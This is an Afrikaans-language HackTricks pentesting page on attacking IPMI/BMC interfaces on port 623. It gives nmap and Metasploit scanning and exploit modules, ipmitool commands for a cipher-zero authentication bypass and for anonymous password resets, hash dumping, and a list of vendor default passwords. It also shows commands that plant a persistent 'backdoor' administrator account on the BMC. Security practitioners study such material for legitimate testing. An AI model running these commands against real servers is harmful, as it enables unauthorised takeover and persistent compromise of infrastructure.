10 KiB
623/UDP/TCP - IPMI
623/UDP/TCP - IPMI
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Basiese Inligting
Oorsig van IPMI
Intelligent Platform Management Interface (IPMI) bied 'n gestandaardiseerde benadering vir afstandsbestuur en monitering van rekenaarstelsels, onafhanklik van die bedryfstelsel of kragtoestand. Hierdie tegnologie stel stelselsadministrateurs in staat om stelsels op afstand te bestuur, selfs wanneer hulle af of onreaksief is, en is veral nuttig vir:
- Pre-OS opstartkonfigurasies
- Kragaf bestuur
- Herstel van stelselfoute
IPMI is in staat om temperature, spannings, waaier spoed, en kragvoorsienings te monitor, sowel as om inventarisinligting te verskaf, hardeware logs te hersien, en waarskuwings via SNMP te stuur. Essensieel vir sy werking is 'n kragbron en 'n LAN-verbinding.
Sedert die bekendstelling deur Intel in 1998, is IPMI deur verskeie verskaffers ondersteun, wat afstandsbestuur vermoëns verbeter, veral met weergawe 2.0 se ondersteuning vir serieel oor LAN. Sleutelkomponente sluit in:
- Baseboard Management Controller (BMC): Die hoof mikrobeheerder vir IPMI operasies.
- Kommunikasiebusse en Interfaces: Vir interne en eksterne kommunikasie, insluitend ICMB, IPMB, en verskeie interfaces vir plaaslike en netwerkverbindinge.
- IPMI Geheue: Vir die stoor van logs en data.
Standaard Poort: 623/UDP/TCP (Dit is gewoonlik op UDP, maar dit kan ook op TCP loop)
Enumerasie
Ontdekking
nmap -n -p 623 10.0.0./24
nmap -n-sU -p 623 10.0.0./24
use auxiliary/scanner/ipmi/ipmi_version
U kan identifiseer die weergawe met:
use auxiliary/scanner/ipmi/ipmi_version
nmap -sU --script ipmi-version -p 623 10.10.10.10
IPMI Kwetsbaarhede
In die ryk van IPMI 2.0 is 'n beduidende sekuriteitsfout deur Dan Farmer ontdek, wat 'n kwesbaarheid blootgestel het deur cipher type 0. Hierdie kwesbaarheid, wat in detail gedokumenteer is by Dan Farmer se navorsing, stel ongeoorloofde toegang moontlik met enige wagwoord mits 'n geldige gebruiker teiken. Hierdie swakheid is oor verskeie BMC's van vervaardigers soos HP, Dell, en Supermicro gevind, wat 'n wye probleem binne alle IPMI 2.0 implementasies aandui.
IPMI Verifikasie Omseiling via Cipher 0
Om hierdie fout te ontdek, kan die volgende Metasploit bykomende skandeerder gebruik word:
use auxiliary/scanner/ipmi/ipmi_cipher_zero
Die uitbuiting van hierdie fout is haalbaar met ipmitool
, soos hieronder gedemonstreer, wat die lys en wysiging van gebruikerswagwoorde moontlik maak:
apt-get install ipmitool # Installation command
ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user list # Lists users
ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user set password 2 abc123 # Changes password
IPMI 2.0 RAKP Authentisering Afgeleide Wachtwoord Hash Herwinning
Hierdie kwesbaarheid stel die herwinning van gesoute gehashde wagwoorde (MD5 en SHA1) vir enige bestaande gebruikersnaam moontlik. Om hierdie kwesbaarheid te toets, bied Metasploit 'n module aan:
msf > use auxiliary/scanner/ipmi/ipmi_dumphashes
IPMI Anonieme Verifikasie
'n Standaardkonfigurasie in baie BMC's laat "anonieme" toegang toe, gekenmerk deur nul gebruikersnaam en wagwoord stringe. Hierdie konfigurasie kan benut word om wagwoorde van benoemde gebruikersrekeninge te herstel met behulp van ipmitool
:
ipmitool -I lanplus -H 10.0.0.97 -U '' -P '' user list
ipmitool -I lanplus -H 10.0.0.97 -U '' -P '' user set password 2 newpassword
Supermicro IPMI Duidelike Wagwoorde
'n Kritieke ontwerppunt in IPMI 2.0 vereis die stoor van duidelike wagwoorde binne BMC's vir outentiseringdoeleindes. Supermicro se stoor van hierdie wagwoorde in plekke soos /nv/PSBlock
of /nv/PSStore
wek beduidende sekuriteitskwessies:
cat /nv/PSBlock
Supermicro IPMI UPnP Kwetsbaarheid
Supermicro se insluiting van 'n UPnP SSDP luisteraar in sy IPMI firmware, veral op UDP-poort 1900, stel 'n ernstige sekuriteitsrisiko in. Kwetsbaarhede in die Intel SDK vir UPnP Toestelle weergawe 1.3.1, soos uiteengesit deur Rapid7 se bekendmaking, stel root-toegang tot die BMC moontlik:
msf> use exploit/multi/upnp/libupnp_ssdp_overflow
Brute Force
HP randomiseer die standaard wagwoord vir sy Integrated Lights Out (iLO) produk tydens vervaardiging. Hierdie praktyk verskil van ander vervaardigers, wat geneig is om statische standaard akrediteer te gebruik. 'n Samevatting van standaard gebruikersname en wagwoorde vir verskeie produkte word hieronder verskaf:
- HP Integrated Lights Out (iLO) gebruik 'n fabrieksrandomiseerde 8-karakter string as sy standaard wagwoord, wat 'n hoër sekuriteitsvlak toon.
- Produkte soos Dell se iDRAC, IBM se IMM, en Fujitsu se Integrated Remote Management Controller gebruik maklik raambare wagwoorde soos "calvin", "PASSW0RD" (met 'n nul), en "admin" onderskeidelik.
- Net so gebruik Supermicro IPMI (2.0), Oracle/Sun ILOM, en ASUS iKVM BMC ook eenvoudige standaard akrediteer, met "ADMIN", "changeme", en "admin" as hul wagwoorde.
Accessing the Host via BMC
Administratiewe toegang tot die Baseboard Management Controller (BMC) open verskeie paaie om toegang tot die gasheer se bedryfstelsel te verkry. 'n Eenvoudige benadering behels die benutting van die BMC se Keyboard, Video, Mouse (KVM) funksionaliteit. Dit kan gedoen word deur die gasheer te herbegin na 'n root shell via GRUB (met init=/bin/sh
) of deur vanaf 'n virtuele CD-ROM te boot wat as 'n reddingsdisk ingestel is. Sulke metodes stel direkte manipulasie van die gasheer se skyf in staat, insluitend die invoeging van backdoors, data-uittrekking, of enige nodige aksies vir 'n sekuriteitsassessering. Dit vereis egter die herbegin van die gasheer, wat 'n beduidende nadeel is. Sonder om te herbegin, is toegang tot die lopende gasheer meer kompleks en wissel dit met die gasheer se konfigurasie. As die gasheer se fisiese of seriële konsole ingelog bly, kan dit maklik oor geneem word deur die BMC se KVM of serial-over-LAN (sol) funksies via ipmitool
. Die verkenning van die benutting van gedeelde hardewarebronne, soos die i2c bus en Super I/O chip, is 'n gebied wat verdere ondersoek vereis.
Introducing Backdoors into BMC from the Host
Na die kompromie van 'n gasheer wat met 'n BMC toegerus is, kan die lokale BMC-koppelvlak benut word om 'n backdoor gebruikersrekening in te voeg, wat 'n blywende teenwoordigheid op die bediener skep. Hierdie aanval vereis die teenwoordigheid van ipmitool
op die gekompromitteerde gasheer en die aktivering van BMC stuurprogramondersteuning. Die volgende opdragte illustreer hoe 'n nuwe gebruikersrekening in die BMC ingespuit kan word deur die gasheer se lokale koppelvlak, wat die behoefte aan verifikasie omseil. Hierdie tegniek is van toepassing op 'n wye reeks bedryfstelsels, insluitend Linux, Windows, BSD, en selfs DOS.
ipmitool user list
ID Name Callin Link Auth IPMI Msg Channel Priv Limit
2 ADMIN true false false Unknown (0x00)
3 root true false false Unknown (0x00)
ipmitool user set name 4 backdoor
ipmitool user set password 4 backdoor
ipmitool user priv 4 4
ipmitool user list
ID Name Callin Link Auth IPMI Msg Channel Priv Limit
2 ADMIN true false false Unknown (0x00)
3 root true false false Unknown (0x00)
4 backdoor true false true ADMINISTRATOR
Shodan
port:623
References
{% hint style="success" %}
Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Ondersteun HackTricks
- Kyk na die subskripsie planne!
- Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
- Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.